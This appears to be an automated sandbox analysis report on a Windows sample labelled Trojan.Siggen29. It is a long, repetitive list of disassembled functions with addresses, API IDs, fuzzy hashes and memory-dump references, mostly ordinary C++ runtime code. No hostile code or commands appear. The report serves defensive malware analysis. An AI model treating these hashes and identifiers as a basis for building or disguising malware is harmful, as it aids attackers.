                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Module$FileHandleName
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2566878671-0
                                                                                                                                                                                                  • Opcode ID: 8a5630142ab7a5fe3b6d9a63da8698e6332b7e063a85ff4532495ae5f1f2b0a0
                                                                                                                                                                                                  • Instruction ID: 393f569bc1f7ae17a38afb5a963f26f4963f3cf2af9deb76041e6c2d4e68d4cc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a5630142ab7a5fe3b6d9a63da8698e6332b7e063a85ff4532495ae5f1f2b0a0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30E17166B1CA82C1EE21BB35F0443B9E3A1EB94FA4FD45232DA5D426E5DF7CE5818310
                                                                                                                                                                                                  Function 00007FF745015CE0 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                                                                  • Opcode ID: 4969339425971265b9ff7054e51a6a5678728dbd002be71af603e48de7f4eb68
                                                                                                                                                                                                  • Instruction ID: 306c785fc17feeba2a4318d8fb660c0ebe3302411bc2a25f07df7a7b7be6eb20
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4969339425971265b9ff7054e51a6a5678728dbd002be71af603e48de7f4eb68
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADB1833AE0DA42C1EA75BE319540639E690AF44FC4F898435DE4D0B7A5FE3EE441CB62
                                                                                                                                                                                                  Function 00007FF74500FB10 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 333COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: integral cannot be stored in wchar_t
                                                                                                                                                                                                  • API String ID: 4097890229-1689078516
                                                                                                                                                                                                  • Opcode ID: 537daa8fa039e2fd7d7a426cad5110617e9acfdf2f4a9efe606bcd97b057bf70
                                                                                                                                                                                                  • Instruction ID: 43d23290b81711c7e69f354b8fa97d900fef9daba41c29cb679ec02506fc03ae
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 537daa8fa039e2fd7d7a426cad5110617e9acfdf2f4a9efe606bcd97b057bf70
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43E1B226A1CB85C5EB10FB78E4402BCB7A1FB45F94F948132EA9D03AA9DF38D485D710
                                                                                                                                                                                                  Function 00007FF74500F670 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: integral cannot be stored in wchar_t
                                                                                                                                                                                                  • API String ID: 4097890229-1689078516
                                                                                                                                                                                                  • Opcode ID: 1427d843f4aed5d308cb1e80176485806e2bc18b85755f29336377a07527ae5d
                                                                                                                                                                                                  • Instruction ID: 33edf367a1b43964f23a4c55a279c79a39136c48e4ca233b1effbddc4178afd5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1427d843f4aed5d308cb1e80176485806e2bc18b85755f29336377a07527ae5d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91E1C326A1C791C9EB10FB78E4402BCB7A0FB45F98F908135EA8D17AA8DF38D485D710
                                                                                                                                                                                                  Function 00007FF745010210 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: integral cannot be stored in wchar_t
                                                                                                                                                                                                  • API String ID: 4097890229-1689078516
                                                                                                                                                                                                  • Opcode ID: 2a81cd6e82fbc0d0f36ed3fe78ed18649df4111d57f3f048927627af8d6163e6
                                                                                                                                                                                                  • Instruction ID: 6d0a565880ea19d59fc16fd047a39a463c9be1fb0e43eb218280c487cfc2bfcd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a81cd6e82fbc0d0f36ed3fe78ed18649df4111d57f3f048927627af8d6163e6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EE1E526A1C795CAEB20EB74D4503BCB7A0FB85B48F904131EA8D17AA9EF39D485C711
                                                                                                                                                                                                  Function 00007FF7450241AC Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                                                  • Opcode ID: 45395b0d96922527765d728b34f0564db099632d62bdb077479cf8bc79a1f4c5
                                                                                                                                                                                                  • Instruction ID: 60bdf1fc6bf3c3d17d09676a7e4347262d481fb97b90e5f9138f388974544f8c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45395b0d96922527765d728b34f0564db099632d62bdb077479cf8bc79a1f4c5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B881AD7AE0C242C5FB75BE399150278F6A0AB11F48FD58031EA4A572B5DB3DFC019B21
                                                                                                                                                                                                  Function 00007FF745017054 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                                                  • Opcode ID: b57ca0e4605b238f207969a4d6775e2ddebffe2bee4ca332d74a7a900d773b3f
                                                                                                                                                                                                  • Instruction ID: 8b54ac73c304d4d53820125282ac9d807e39ec12cd0e1eddfc4baa3c3115802f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b57ca0e4605b238f207969a4d6775e2ddebffe2bee4ca332d74a7a900d773b3f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2291BE77A08785CAE750EB74E8802ACBBA0FB44B88F544129EF8D17765EF39D195CB01
                                                                                                                                                                                                  Function 00007FF74500CEC0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 174COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                  • API String ID: 3668304517-2658103896
                                                                                                                                                                                                  • Opcode ID: 1d84cbfa4318233187c0dc2a796e371425faf289532cb1b36cbea29742da1837
                                                                                                                                                                                                  • Instruction ID: b338213a78824d69a96efe7302e40c1efa1b33cc02a4dea957d7f68827dcf6b5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d84cbfa4318233187c0dc2a796e371425faf289532cb1b36cbea29742da1837
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F761AF67B09B45D9EB10FBB9E0413ADA3B1AB44FA8F804631DE5C277A8DE38D546C350
                                                                                                                                                                                                  Function 00007FF7450156A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                                                                                  • Opcode ID: 57083e70d1afa7b20f372f1cde8bdf442fc3087724e161c57bd257221ff647c2
                                                                                                                                                                                                  • Instruction ID: 5a94316f3fe380bbf7c6f2c97aeaafc0de838f57fd118edd6e442044af0e251a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57083e70d1afa7b20f372f1cde8bdf442fc3087724e161c57bd257221ff647c2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D051B03AB1D602CADB14FB25E444A38B791FB44F88F904135DA494B7A8EF3EE841CB11
                                                                                                                                                                                                  Function 00007FF7450175D4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                                                  • Opcode ID: 5c793aab23eec38271f8c7605626d84685e601824f318c1dfa0f80f2955c9ea4
                                                                                                                                                                                                  • Instruction ID: 0a07ba7309fc4b439bea53749a7606053c0f7601cd4a0c26ea04f96297d93d6b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c793aab23eec38271f8c7605626d84685e601824f318c1dfa0f80f2955c9ea4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8551C03A90C242C6EB70BF359544668B6A0FB44F94F984135DA5C47BA5EF3DE450CB22
                                                                                                                                                                                                  Function 00007FF745016DE4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                                                  • Opcode ID: a5ef9be401f65829ae2f077cda814f790cefcec111a1a007bb95ec9fbea5e673
                                                                                                                                                                                                  • Instruction ID: 553336c64449c896a1045faa451361ba9e12c07b2c0fe6a245c3f8b86398476f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5ef9be401f65829ae2f077cda814f790cefcec111a1a007bb95ec9fbea5e673
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA618F3690CB85C6D721AF25E4403AAB7A0FB85B98F444225EB8D07B65EF3DE590CB11
                                                                                                                                                                                                  Function 00007FF7450121AB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Negative precision.$Number is too big.
                                                                                                                                                                                                  • API String ID: 909987262-3993994484
                                                                                                                                                                                                  • Opcode ID: 1e8bf670a80ead57cba2636150351d364dd78a7ff077fd85631ce462de8c0439
                                                                                                                                                                                                  • Instruction ID: 3f35aa1b6fb7c996ad5e98fdad8c77812d61be52c0f3d54b638d77b345c43556
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e8bf670a80ead57cba2636150351d364dd78a7ff077fd85631ce462de8c0439
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5611597B90C28BDFF3077B7544190BDBBB0BF41F24FA48831D798414A3E91E25529662
                                                                                                                                                                                                  Function 00007FF745020558 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                                                  • Opcode ID: dbab30d8a6d21c764778c733185e7f0760ddcf84baf50d27d584208956b53964
                                                                                                                                                                                                  • Instruction ID: 62753a1f83cc52265123fb2d51e2898e71458772b325817c1e06972d7c4ed6e3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbab30d8a6d21c764778c733185e7f0760ddcf84baf50d27d584208956b53964
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72D1DF26B1CB81C9E710EF75D4502ACB7B1F745B98F804226EE4E57BA9CE38E806C750
                                                                                                                                                                                                  Function 00007FF7450014D0 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3942279934-0
                                                                                                                                                                                                  • Opcode ID: ebd5d0b6ffc0fbe65e675c7e949a9b0ddd48fe8675a33c498a116e3d73883f0c
                                                                                                                                                                                                  • Instruction ID: 658c96d5816ab4b2a56a264785ab77cbf7de20b1bad097b42b9dea987501d87e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebd5d0b6ffc0fbe65e675c7e949a9b0ddd48fe8675a33c498a116e3d73883f0c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9251A426E0DB86C5EA14BF25F9403B9A361EF44F94F944231EA9D077E5EE3CE0818710
                                                                                                                                                                                                  Function 00007FF74501780C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __except_validate_context_record
                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                  • API String ID: 1467352782-3733052814
                                                                                                                                                                                                  • Opcode ID: 8e112c9cc8b57a005fe7f9316bfc4ed2e968ad98c87934438d9f9115b34ab283
                                                                                                                                                                                                  • Instruction ID: 01194acf46c16166ccb8734cbfcc8483477a383071d892858537e0b69738ad2e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e112c9cc8b57a005fe7f9316bfc4ed2e968ad98c87934438d9f9115b34ab283
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5471DF36A0C282C6DB64BF31904077DBBA0FB40F88F948135DA8D47AA9EE3DD591C752
                                                                                                                                                                                                  Function 00007FF745017EA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 2558813199-1018135373
                                                                                                                                                                                                  • Opcode ID: 4a13f81d0c027ac9a82ce784f581a5edc0b391854fe52833230df926a24ae562
                                                                                                                                                                                                  • Instruction ID: 39d860de50dd555626b8549c13dcff2196cef53f64f1a5ed8b04c2fcb8d06253
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a13f81d0c027ac9a82ce784f581a5edc0b391854fe52833230df926a24ae562
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1517F3A61C745C6D660FB31E54026EB7A4FB88BA0F540134EB8D0BB65EF39E451CB12
                                                                                                                                                                                                  Function 00007FF74501C828 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, xrefs: 00007FF74501C866
                                                                                                                                                                                                  Memory Dump Source
